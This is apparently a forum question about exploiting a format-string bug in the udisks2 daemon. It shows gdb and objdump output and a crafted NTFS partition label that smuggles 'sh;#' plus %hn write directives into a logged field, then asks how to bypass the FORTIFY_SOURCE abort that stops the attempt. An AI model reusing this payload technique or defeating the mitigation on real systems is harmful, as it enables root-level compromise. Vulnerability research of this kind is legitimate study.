I found a daemon running as uid 0 that has a string format vulnerability. It is compiled with -Wformat-security and -D_FORTIFY_SOURCE=2 on. I'm trying to write an exploit for it, but what I get is:
0000000000018370 <g_log_structured@plt>:
18370: ff 25 d2 29 25 00 jmpq *0x2529d2(%rip) # 26ad48 <g_log_structured>
47b36: e8 35 08 fd ff callq 18370 <g_log_structured@plt>
root@kali:~# gdb /usr/lib/udisks2/udisksd
GNU gdb (Debian 7.12-6+b1) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/lib/udisks2/udisksd...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x19eb0
(gdb) r
Starting program: /usr/lib/udisks2/udisksd
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, 0x000055555556deb0 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x7ffff596f510 <__libc_system>
(gdb) q
A debugging session is active.
Inferior 1 [process 2281] will be killed.
Quit anyway? (y or n) y
root@kali:~# mkfs.ntfs -L 'sh;#AAAA%24328x%7$hn%214719246x%8$hn' /dev/sdc1
root@kali:~#
root@kali:~# blkid
/dev/sr0: UUID="2018-04-12-10-04-02-00" LABEL="Kali Live" TYPE="iso9660" PTUUID="a9ef3e16" PTTYPE="dos"
/dev/sda1: UUID="ab38774d-df2f-4712-88f6-563fc9e71ac0" TYPE="ext4" PARTUUID="1f4e07df-01"
/dev/sda5: UUID="789d84f1-2e1b-47c4-8b1c-aaa966153169" TYPE="swap" PARTUUID="1f4e07df-05"
/dev/loop0: TYPE="squashfs"
/dev/sdb1: LABEL="sh;#AAAA%24328x%7$hn%214719246x%8$hn" UUID="42FAB3436A7C2561" TYPE="ntfs" PTTYPE="dos" PARTUUID="7ddb2be9-01"
root@kali:~# /usr/lib/udisks2/udisksd
udisks-Message: 11:02:39.042: udisks daemon version 2.7.6 starting
** (udisksd:2468): WARNING **: 11:02:39.061: failed to load module mdraid: libbd_mdraid.so.2: cannot open shared object file: No such file or directory
(udisksd:2468): udisks-WARNING **: 11:02:39.063: Failed to load the 'mdraid' libblockdev plugin
udisks-Message: 11:02:39.220: Acquired the name org.freedesktop.UDisks2 on the system message bus
*** invalid %N$ use detected ***
Aborted
Is there any feasible way around this 'invalid %N$' abort?
